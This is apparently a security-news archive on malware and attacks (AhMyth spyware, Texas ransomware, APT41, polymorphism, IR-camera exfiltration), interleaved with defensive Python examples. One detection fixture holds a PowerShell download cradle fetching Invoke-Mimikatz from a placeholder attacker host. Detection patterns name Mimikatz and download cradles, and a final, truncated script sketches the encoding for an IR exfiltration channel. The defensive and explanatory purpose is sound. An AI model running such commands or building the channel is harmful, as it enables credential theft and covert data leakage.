Category Archives: Malware

Should you block newly registered domains? Researchers say yes

7 out of 10 newly registered domains (NRDs) are either malicious, suspicious or not safe for work, say Palo Alto Networks researchers, who advise organizations to block access to them with URL filtering. “While this may be deemed a bit aggressive by some due to potential false-positives, the risk from threats via NRDs is much greater. At the bare minimum, if access to NRDs is allowed, then alerts should be set up for additional visibility,” … More

The post Should you block newly registered domains? Researchers say yes appeared first on Help Net Security.

App tainted with AhMyth open-source spyware appeared on Google Play Store twice

ESET researchers discovered that an Android app carrying the AhMyth open-source RAT got past Google Play's vetting twice within two weeks.

ESET malware researcher Lukas Stefanko found that spyware built on the AhMyth open-source RAT was uploaded to Google Play twice in two weeks, bypassing Google's security checks each time.

The malicious app, named Radio Balouch (or RB Music), includes functionality from AhMyth Android RAT.

RB Music is a working streaming app for Balouchi music, traditional to the Balochistan region of south-western Asia.

“ESET researchers have discovered the first known spyware that is built on the foundations of AhMyth open-source malware and has circumvented Google’s app-vetting process. The malicious app, called Radio Balouch aka RB Music, is actually a fully working streaming radio app for Balouchi music enthusiasts, except that it comes with a major sting in its tail – stealing personal data of its users.” wrote Stefanko. “The app snuck into the official Android app store twice, but was swiftly removed by Google both times after we alerted the company to it.”

The RAT's source code has been publicly available on GitHub since October 2017, so anyone can build on it.

According to ESET experts, this is the first case of malicious apps built on AhMyth that spread through the official Google store bypassing Google’s app-vetting mechanism.

The app can steal contacts, harvest files stored on the device and send SMS messages from it. It also contains code to steal SMS messages stored on the device, but that code is inert: Google's recent restrictions allow only the default SMS app to access those messages, so a music app cannot obtain the permission.

Stefanko pointed out that the AhMyth code inside the app was neither obfuscated nor otherwise protected, which should have made it easy to detect; Google's vetting nevertheless missed it.

ESET found two different versions of the malicious Radio Balouch app on Google Play; between them the app had around 100 downloads.

The researchers first spotted the app on Google Play on July 2, 2019, and it was removed within 24 hours of their report. Radio Balouch reappeared on July 13, 2019; ESET detected it again and alerted Google, which quickly removed it a second time.

The malicious app was also distributed through third-party app stores and from a dedicated website, radiobalouch[.]com, promoted via a related Instagram account. The same server also handled the spyware's C&C communications. The domain was registered on March 30, 2019, and the operators took it down after ESET published its report.

Once launched, the app asks the user to choose a language (English or Farsi) and then starts requesting permissions, including access to files on the device and to the contacts list.

“Then, the app requests the permission to access contacts. Here, to camouflage its request for this permission, it suggests this functionality is necessary should the user decide to share the app with friends in their contact list. If the user declines to grant the contact permissions, the app will work regardless.” continues the report.

After setup, the app shows a home screen with music options and lets the user register and log in. The login is fake: any credentials entered are accepted. The researchers believe this feature exists to harvest credentials that the operators can then try against other services where the victim reuses the same password.

“The (repeated) appearance of the Radio Balouch malware on the Google Play store should serve as a wake-up call to both the Google security team and Android users. Unless Google improves its safeguarding capabilities, a new clone of Radio Balouch or any other derivative of AhMyth may appear on Google Play.” Stefanko concludes.

“While the key security imperative “Stick with official sources of apps” still holds, it alone can’t guarantee security. It is highly recommended that users scrutinize every app they intend to install on their devices and use a reputable mobile security solution.”
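The permission pattern described above (contacts, device files, sending and reading SMS, requested by a radio player) is exactly the kind of mismatch that can be checked mechanically before an app is trusted. The following is an added example, not ESET's tooling or the Radio Balouch code: it parses a decoded AndroidManifest.xml (as produced by apktool or aapt) and reports permissions that a streaming radio app has no reason to hold. The manifest text is constructed for illustration, and the "expected" permission set for a radio app is this example's own assumption.

```python
"""Audit an Android app's requested permissions against what its
declared purpose needs. Added example; manifest and category table are
constructed assumptions, not ESET's data.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest fragment: a "radio app" asking for far more than audio.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.rbmusic">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="RB Music"/>
</manifest>
"""

# Assumption: the permissions a streaming radio client legitimately needs.
EXPECTED = {
    "radio": {
        "android.permission.INTERNET",
        "android.permission.ACCESS_NETWORK_STATE",
        "android.permission.WAKE_LOCK",
        "android.permission.FOREGROUND_SERVICE",
    },
}

# Dangerous-protection-level permissions that enable data theft or SMS abuse.
HIGH_RISK = {
    "android.permission.READ_CONTACTS",
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.SEND_SMS",
    "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_CALL_LOG",
}

def requested_permissions(manifest_xml: str) -> set:
    """Collect every android:name on <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    return {
        el.get(ANDROID_NS + "name")
        for el in root.iter("uses-permission")
        if el.get(ANDROID_NS + "name")
    }

def audit(manifest_xml: str, category: str) -> dict:
    """Return the unexpected and high-risk permissions for the given category."""
    requested = requested_permissions(manifest_xml)
    unexpected = requested - EXPECTED[category]
    return {
        "package": ET.fromstring(manifest_xml).get("package"),
        "unexpected": sorted(unexpected),
        "high_risk": sorted(unexpected & HIGH_RISK),
        "verdict": "suspicious" if unexpected & HIGH_RISK else "consistent",
    }

if __name__ == "__main__":
    result = audit(SAMPLE_MANIFEST, "radio")
    print(result["package"], "->", result["verdict"])
    for p in result["high_risk"]:
        print("  high-risk:", p)
```

The check is deliberately conservative: it flags only permissions that are both outside the category's expected set and in the high-risk list, so an extra WAKE_LOCK does not generate noise while READ_CONTACTS plus SEND_SMS on a music player does. Note that it audits what the app declares; the runtime prompts the report describes (the "share with friends" excuse for contacts) are how the app talks the user into granting what is declared here.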

Pierluigi Paganini

(SecurityAffairs – ahMyth, spyware)

The post App tainted with AhMyth open-source spyware appeared on Google Play Store twice appeared first on Security Affairs.

Texas attackers demand $2.5 million to allow towns to access encrypted data

Crooks behind the attacks against Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The cybercriminals behind the wave of attacks that hit 23 Texas governments are now demanding $2.5 million to allow victims to access encrypted data.

The attacks began on the morning of August 16, and the security experts investigating the incidents believe they were a coordinated operation by a single cybercrime gang.

Initially, at least 23 local government organizations were reported to have been hit by the ransomware. The Texas Department of Information Resources (DIR) is still investigating and supporting the affected entities with mitigation, and the evidence continues to point to a single threat actor.

The State Operations Center (SOC) was activated once the attacks were detected.

According to the Texas Department of Information Resources (DIR) the number of impacted towns has been reduced to 22.

“As of the time of this release, responders have engaged with all twenty-two entities to assess the impact to their systems and bring them back online.” reads an update provided by the DIR.

“More than twenty-five percent of the impacted entities have transitioned from response and assessment to remediation and recovery, with a number of entities back to operations as usual.”

The city of Keene confirmed the attack and announced it is working with law enforcement to resolve a cyber incident.

Another of the towns hit by the ransomware attack, the City of Borger, confirmed that business and financial operations and services were impacted, although basic and emergency services continued to be operational.

“On the morning of August 16, 2019 the City of Borger was one of more than 20 entities in Texas that reported a ransomware attack.” reads the press release published by the City of Borger.

“Currently, Vital Statistics (birth and death certificates) remains offline, and the City is unable to take utility or other payments. Until such time as normal operations resume, no late fees will be assessed, and no services will be shut off,”

Keene Mayor Gary Heinrich told NPR the attackers are asking for $2.5 million to unlock the files.

“Well, just about everything we do at City Hall is impacted” Heinrich said.

“They got into our software provider, the guys who run our IT systems. A lot of folks in Texas use providers to do that, because we don’t have a staff big enough to have IT in house.”

Heinrich's account points at a managed service provider as the common entry point, which would explain how a single actor could hit more than twenty entities in one morning. Unfortunately, ransomware attacks are a serious problem for US state and local government offices; recently several cities in Florida fell victim, including Key Biscayne, Riviera Beach and Lake City.

In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Pierluigi Paganini

(SecurityAffairs – Texas, ransomware)

The post Texas attackers demand $2.5 million to allow towns to access encrypted data appeared first on Security Affairs.

Block newly-registered domains to reduce security threats in your organisation

It’s no secret that there are a lot of websites on the internet hosting malicious content whether they be phishing pages, scams or malware itself. Every day we hear of new attacks, there’s a common denominator of either a user having clicked on a link to a fraudulent website or a site having played host […]… Read More

The post Block newly-registered domains to reduce security threats in your organisation appeared first on The State of Security.
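Both of the newly-registered-domain posts above (the Palo Alto Networks research and the State of Security piece) stop at the recommendation "block, or at least alert". The following is an added example, not code from either post, of what the policy looks like when applied to resolver logs: each queried hostname is reduced to its registrable domain, looked up in a WHOIS creation-date feed, and classified as block, alert or allow. The public-suffix stub, the registration-date table, the resolver log lines and the 30-day block / 180-day alert thresholds are all constructed assumptions; a real deployment would load the full Public Suffix List and a live WHOIS or NRD feed.

```python
"""Newly registered domain (NRD) policy check. Added example; the suffix
stub, feed and thresholds are constructed assumptions, not a vendor's.
"""
from datetime import date, timedelta

# Constructed: a few public suffixes. Load the real Public Suffix List
# (publicsuffix.org) instead of this stub in production.
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk", "org.uk"}

# Constructed sample feed of registrable domain -> WHOIS creation date.
REGISTRATION_DATES = {
    "example.com": date(1995, 8, 14),
    "radiobalouch.com": date(2019, 3, 30),    # date quoted in the AhMyth post above
    "fresh-login-portal.co.uk": date(2019, 8, 20),
}

def registrable_domain(hostname: str) -> str:
    """Reduce www.a.b.example.co.uk -> example.co.uk using the suffix stub."""
    labels = hostname.lower().rstrip(".").split(".")
    # Try the longest matching public suffix first (co.uk before uk).
    for n in (2, 1):
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return ".".join(labels[-2:]) if len(labels) >= 2 else hostname.lower()

def classify(hostname, today, block_days=30, alert_days=180, feed=REGISTRATION_DATES):
    """Return 'block', 'alert' or 'allow' for one hostname.

    The posts recommend blocking NRDs and at minimum alerting on them but
    fix no age window; the windows here are assumptions. A domain with no
    registration data alerts rather than silently passing.
    """
    if isinstance(today, str):
        today = date.fromisoformat(today)
    created = feed.get(registrable_domain(hostname))
    if created is None:
        return "alert"
    age = today - created
    if age < timedelta(days=block_days):
        return "block"
    if age < timedelta(days=alert_days):
        return "alert"
    return "allow"

def evaluate_dns_log(lines, today, **kw):
    """Apply classify() to constructed resolver log lines: 'ts client qname'."""
    verdicts = {}
    for line in lines:
        qname = line.split()[2]
        verdicts[qname] = classify(qname, today, **kw)
    return verdicts

if __name__ == "__main__":
    sample = [                                    # constructed resolver log
        "2019-08-21T09:00:01 10.0.0.5 www.example.com",
        "2019-08-21T09:00:02 10.0.0.5 cdn.radiobalouch.com",
        "2019-08-21T09:00:03 10.0.0.7 fresh-login-portal.co.uk",
        "2019-08-21T09:00:04 10.0.0.7 unknown-host.net",
    ]
    for q, v in evaluate_dns_log(sample, "2019-08-21").items():
        print(f"{v:5s} {q}")
```

Two details matter in practice. Subdomains must be collapsed to the registrable domain before the age lookup, otherwise a fresh `login.victimbank.co.uk`-style host on an old domain and a fresh domain behind a familiar-looking subdomain are both misjudged. And a missing registration record should alert, not allow: the feed being incomplete is itself a signal worth a look.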

Smashing Security #142: Mercedes secret sensors, smart cities, and ransomware runs riot

Darknet Diaries host Jack Rhysider joins us to discuss how cities in Texas are being hit by a wave of ransomware, how Mercedes Benz has installed a tracker in your car (but not for the reason you think), the security threats impacting smart cities, and a new feature coming to your Facebook app.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast, hosted by computer security veterans Graham Cluley and Carole Theriault.

China-linked APT41 group targets US-Based Research University

Security experts at FireEye observed the China-linked APT41 group targeting a web server at a U.S.-based research university.

FireEye experts observed the China-linked APT41 group targeting a web server at a U.S.-based research university.

APT41 has been active since at least 2012 and has carried out both state-sponsored espionage campaigns and, since 2014, financially motivated attacks. The group has hit entities in the gaming, healthcare, high-tech, higher education, telecommunications and travel services industries.

Unlike other China-based actors, the group also uses the non-public malware of its espionage operations in activity that appears to be for personal gain; FireEye has observed 46 different malware families and tools in APT41 campaigns.

“APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain.” states the report published by FireEye. “Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.”


FireEye has published a detailed report on the evolution of the group's tactics, techniques and procedures (TTPs), and found overlaps with other tracked Chinese espionage operators such as BARIUM and the Winnti group.

APT41 uses several techniques for initial compromise, including spear-phishing, lateral movement from trusted third parties and the use of stolen credentials.

FireEye observed APT41 spear-phishing emails carrying attachments such as compiled HTML (.chm) files.

The group's arsenal includes backdoors, credential stealers, keyloggers and rootkits. APT41 has also used TeamViewer to deploy its malware inside compromised environments.

The attack on the publicly accessible web server of a U.S.-based research university took place in April 2019. The attackers exploited CVE-2019-3396 in Atlassian Confluence Server to compromise the system and load additional payloads, including a variant of the China Chopper web shell.

Two further files followed, the HIGHNOON backdoor and a rootkit; within the next 35 minutes the attackers used both the China Chopper web shell and the HIGHNOON backdoor to send commands to the compromised server.

“HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins.” reads the analysis published by FireEye.

Through the HIGHNOON backdoor the attackers ran a PowerShell command that downloaded a script from the PowerSploit project. The script appears to be a copy of the Invoke-Mimikatz post-exploitation tool, which reflectively loads Mimikatz 2.0 into memory without writing it to disk.

The attackers also performed further reconnaissance and downloaded two more files, the dropper and the encrypted/compressed payload of the ACEHASH malware, a credential stealer and password-dumping utility.

In summary, the attackers exploited the Confluence vulnerability to execute commands and deploy custom malware. Mimikatz failed, but ACEHASH let them harvest a single credential from the system. The good news is that FireEye successfully neutralized the attack.
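The sequence FireEye describes (a web application process handing control to a shell, then PowerShell fetching Invoke-Mimikatz into memory within about half an hour) is a detectable pattern regardless of which Confluence bug got the attacker in. The following is an added example, not FireEye's detection content, of that logic run over constructed Sysmon-style process-creation records (event ID 1 fields ParentImage, Image, CommandLine, plus a host and timestamp). The Confluence service is assumed to run as java.exe under an Atlassian install path, and the download URL is a placeholder.

```python
"""Detect a web-app process spawning a shell followed by a PowerShell
download cradle. Added example; events and paths are constructed.
"""
import re

# Web-facing parents that should never spawn an interactive shell.
WEB_PARENTS = {"java.exe", "w3wp.exe", "httpd.exe", "tomcat9.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Common PowerShell download-and-execute cradle fragments.
CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|IEX\b|Invoke-Expression"
    r"|FromBase64String|-enc(odedcommand)?\b)", re.IGNORECASE)
# Tool names the report says were loaded reflectively.
TOOLING = re.compile(r"(Invoke-Mimikatz|PowerSploit|mimikatz)", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyse(event: dict) -> list:
    """Return the rule names one process-creation event triggers."""
    hits = []
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event.get("CommandLine", "")
    if parent in WEB_PARENTS and image in SHELLS:
        hits.append("webapp_spawned_shell")
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE.search(cmd):
        hits.append("powershell_download_cradle")
    if TOOLING.search(cmd):
        hits.append("credential_tooling_named")
    return hits

def correlate(events: list, window_s: int = 3600) -> list:
    """Alert on hosts where a web-app shell spawn is followed within
    window_s seconds by a download cradle (the report's 35-minute chain)."""
    alerts, first_shell = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        hits, host = analyse(ev), ev["Host"]
        if "webapp_spawned_shell" in hits:
            first_shell.setdefault(host, ev["ts"])
        if ("powershell_download_cradle" in hits and host in first_shell
                and ev["ts"] - first_shell[host] <= window_s):
            alerts.append((host, ev["ts"], sorted(set(hits))))
    return alerts

# Constructed sample events (ts = seconds since an arbitrary epoch).
SAMPLE = [
    {"ts": 0, "Host": "conf01",
     "ParentImage": r"C:\Atlassian\Confluence\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ts": 900, "Host": "conf01",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://attacker.invalid/Invoke-Mimikatz.ps1')"},
    {"ts": 30, "Host": "build02",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\src"},
]

if __name__ == "__main__":
    for host, ts, rules in correlate(SAMPLE):
        print(f"ALERT host={host} t+{ts}s rules={rules}")
```

The per-event rules are noisy on their own (administrators run PowerShell download cradles too), which is why the correlation keys on the web-server-spawned shell first: a Confluence or IIS worker launching cmd.exe is rare enough to anchor the chain, and the cradle within the window is what turns it into an alert rather than a hunt lead.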

Pierluigi Paganini

(SecurityAffairs – APT41, hacking)

The post China-linked APT41 group targets US-Based Research University appeared first on Security Affairs.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity incident can generate unexpected costs in several different areas. What does dealing with an attack cost in these four industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

Polymorphic Refers to a Malware’s Ability to Change

When it comes to malicious programs, polymorphic refers to a malware's ability to change itself and its identifiable features in order to avoid detection. Many types of malware can take a polymorphic form, including viruses, trojans, keyloggers and bots. The technique involves continuously changing characteristics such as file names, encryption keys and the decryption stub, so that each copy looks different to detection tools that match on fixed byte patterns.

The point of polymorphism is to evade the pattern-matching detection that many security products, antivirus included, rely on. While the malware changes some of its characteristics, its purpose is unchanged: a virus continues to infect other devices even though its signature is different. Worse, even if the new signature is detected and added to a security database, the polymorphic malware can simply change again and keep evading detection.

Polymorphic Malware Examples

It has been reported that 97% of malware infections now make use of polymorphic techniques, and new variations of the tactic have kept appearing over the past decade. Two well-known examples:

Storm Worm Email

An infamous spam email first sent in 2007 carried the subject line “230 dead as storm batters Europe.” At one point it was responsible for 8% of all malware infections worldwide. Once opened, the attachment installed a win32com service along with a trojan that turned the computer into a bot. The malware was so hard to detect because it was re-packed roughly every 30 minutes, so a signature written for one copy missed the next.

CryptoWall Ransomware

Polymorphic malware gets onto a computer and stays there undetected by changing its characteristics from time to time. What made CryptoWall ransomware even harder to detect is that it was essentially rebuilt for each victim, so every infection was unique.

Threat of Polymorphic Malware

Much of today's malware uses some polymorphic capability, which leaves traditional signature-based antivirus largely helpless. Antivirus, firewalls and intrusion prevention systems used to be enough to secure a device; polymorphism defeats those precautions wherever they depend on static signatures, which is why prevention alone keeps failing to stop polymorphic attacks.

Best Practices Against Polymorphic Malware

Because polymorphic malware changes itself, protecting your devices and your company calls for a layered approach to security that combines people, processes and technology. Here are best practices you can use against polymorphic malware:

Update your software

This is a straightforward way to stay protected. Keep all programs and tools used in the company updated. Vendors regularly release security updates to patch known vulnerabilities, and running outdated software leaves your systems open to attacks that are already public.

Password maintenance

When it comes to passwords, each employee should be required to use strong ones that are long, unique per service and, where the policy allows, mix upper- and lower-case characters, numbers and symbols; a password manager makes this practical. Passwords should be changed promptly whenever there is evidence of compromise. Note that current guidance such as NIST SP 800-63B advises against forcing rotation on a fixed schedule, because scheduled changes tend to produce weaker, predictable passwords.

Report suspicious emails

If an employee receives a suspicious email, this should be reported at once. Do not open emails from unknown or suspicious senders, and never open their attachments.

Use behavior-based detection tools

Because polymorphic malware changes its characteristics to avoid detection by conventional tools, behaviour-based detection is the better fit: it pinpoints threats in real time by looking at what a program does (process, file, network and registry activity) rather than at what its bytes look like. A sample that re-encrypts itself still performs the same actions, so the same behavioural rule keeps catching it.
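The contrast between the signature-based detection that polymorphism defeats and the behaviour-based detection recommended above can be shown in a few dozen lines. The following is an added example, not from the original article and not real malware: the "payload" is a harmless marker string, and `mutate()` wraps it in a fresh random XOR key and random-length junk each time, so every copy has a different hash and different bytes, much like the re-keying the article describes. The framing (magic bytes, key length, junk length) is this example's own.

```python
"""Why byte-signature matching fails against polymorphic code and why
matching on what the sample unpacks to does not. Added example; the
payload is a harmless marker, not malicious code.
"""
import hashlib
import os
import struct

PAYLOAD = b"MARKER: harmless stand-in for a malicious routine"
MAGIC = b"POLY"

def mutate(payload: bytes = PAYLOAD) -> bytes:
    """Produce a new 'variant': MAGIC | keylen | junklen | key | junk | xor(payload)."""
    key = os.urandom(8 + os.urandom(1)[0] % 9)        # 8..16 byte random key
    junk = os.urandom(os.urandom(1)[0] % 64)           # 0..63 bytes of noise
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return MAGIC + struct.pack("<BB", len(key), len(junk)) + key + junk + body

def unpack(sample: bytes) -> bytes:
    """The decoder stub's job: recover the constant payload from a variant."""
    if not sample.startswith(MAGIC):
        raise ValueError("not a POLY sample")
    klen, jlen = struct.unpack("<BB", sample[4:6])
    key = sample[6:6 + klen]
    body = sample[6 + klen + jlen:]
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def static_signature_match(sample: bytes, signature: bytes = PAYLOAD) -> bool:
    """Classic AV check: does the known byte pattern appear in the file as stored?"""
    return signature in sample

def behavioural_match(sample: bytes, signature: bytes = PAYLOAD) -> bool:
    """Check after the sample has 'run' its decoder, i.e. on what it unpacks to."""
    return signature in unpack(sample)

def compare_variants(n: int = 5) -> dict:
    """Generate n variants and count how each detection strategy fares."""
    variants = [mutate() for _ in range(n)]
    return {
        "distinct_hashes": len({sha256(v) for v in variants}),
        "static_hits": sum(static_signature_match(v) for v in variants),
        "behavioural_hits": sum(behavioural_match(v) for v in variants),
    }

if __name__ == "__main__":
    print(compare_variants())
```

Every run yields `n` distinct hashes, zero static hits and `n` behavioural hits: a hash or byte-pattern blocklist would need a new entry per variant, while anything that observes the decoded payload (memory scanning, sandbox behaviour, API-call patterns) sees the same thing each time. The decoder stub here is fixed, which real polymorphic engines also vary; that is why the defender's anchor has to be behaviour rather than bytes.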

Also Read,

Understanding What Is Malware Analysis

Pale Moon Archive Server Infected With Malware

WannaHydra – The Latest Malware Threat For Android Devices


The post Polymorphic Refers to a Malware’s Ability to Change appeared first on .

Alert! 27 apps found on Google Play Store that prompt you to install Fake Google Play Store

Quick Heal Security Lab spotted 27 malicious apps of dropper category on official “Google Play Store”. These apps have been removed from Play Store after Quick Heal Security Lab reported it to Google last week. These apps continuously show installation prompt for fake “Google Play Store”. If any user falls…

Blinking Red Light of Death for Cameras

Cameras found on street corners, in offices and in public spaces can all be used by attackers in one way or another to steal sensitive information. Researchers from the Ben-Gurion University of the Negev devised a method that uses the infrared (IR) LEDs of certain cameras, which can look like a blinking red light, to exfiltrate data from a targeted network: the data is encoded and then transmitted as IR signals. They built a proof-of-concept malware, aIR-Jumper, that runs on a machine inside the targeted network and controls the cameras.

The researchers noted that:

“Many surveillance and security cameras are equipped with IR LEDs which enable night vision. We show that malware residing within the internal networks of the organization can control these IR LEDs, turning them on and off or controlling their IR intensity.

“We implement a malware prototype and show that binary data can be encoded over the IR signals and leaked to an attacker from a distance of tens of meters away. Notably, many surveillance and security cameras monitor public areas, and therefore attackers can easily establish a line of sight with them.”

The research shows that surveillance cameras can serve as a covert channel for stealing passwords, keys and other sensitive data. An attacker first gets malware onto the network, for example through a phishing scam. The malware then scans the network's IP range for cameras, which are easy to identify by their protocols or MAC address prefixes.

Once found, the malware connects to the cameras. Even where they are password protected, the researchers consider that easy to circumvent at this point.

“The malware in the network collects sensitive data that it wants to exfiltrate. When the data is collected, the malware transmits it by encoding it over the IR signals emitted from the camera’s night vision IR LEDs. Exfiltration may take place at predefined times or as the result of a trigger from the attacker side. An attacker located outside the secured facility (e.g., on the street) can receive the IR signals by carrying a standard video camera that is aimed at the transmitting surveillance camera,” the paper says. “The received video is then processed in order to decode the transmitted data.

“An attacker located outside the secured facility (e.g., on the street) generates invisible IR signals by using IR LEDs. The IR signals are modulated with the C&C messages to be delivered to the malware. The video stream recorded by the surveillance camera is received by the malware which processes and decodes the transmitted data,” the researchers said.

The malware is only a proof of concept, but every element needed for a real attack is present.
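The two quoted passages describe the channel at a high level: bits encoded over the IR LEDs, a camera on the street recording them, and the reverse path for C&C. The following is an added example, not the Ben-Gurion researchers' prototype, that makes the bit level concrete: data is framed and sent as on/off LED states, one symbol per video frame, and the receiver thresholds the LED's brightness in each recorded frame and decodes the bits back. The preamble, length byte and XOR checksum are this example's own framing choices, the brightness trace is constructed in place of real video, and only on/off keying is modelled (the paper also discusses varying IR intensity).

```python
"""Bit-level sketch of an IR LED exfiltration channel: framing, on/off
keying per video frame, thresholding and decoding on the receiver.
Added example; framing and brightness trace are constructed.
"""
import random

PREAMBLE = [1, 0, 1, 0, 1, 0, 1, 1]      # sync pattern so the receiver can align

def to_bits(data: bytes) -> list:
    return [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]

def from_bits(bits: list) -> bytes:
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, len(bits) - len(bits) % 8, 8))

def checksum(data: bytes) -> int:
    x = 0
    for b in data:
        x ^= b
    return x

def encode_frames(payload: bytes) -> list:
    """LED state per video frame: preamble, length byte, payload, checksum."""
    if len(payload) > 255:
        raise ValueError("one frame set carries at most 255 bytes")
    frame = bytes([len(payload)]) + payload + bytes([checksum(payload)])
    return PREAMBLE + to_bits(frame)

def led_to_brightness(states: list, on: int = 220, off: int = 30, noise: int = 0) -> list:
    """Simulate what the attacker's camera measures on the IR LED each frame."""
    return [(on if s else off) + random.randint(-noise, noise) for s in states]

def decode_brightness(samples: list, threshold: int = 128) -> bytes:
    """Threshold each frame to a bit, find the preamble, verify length and checksum."""
    bits = [1 if s >= threshold else 0 for s in samples]
    for start in range(len(bits) - len(PREAMBLE) + 1):
        if bits[start:start + len(PREAMBLE)] != PREAMBLE:
            continue
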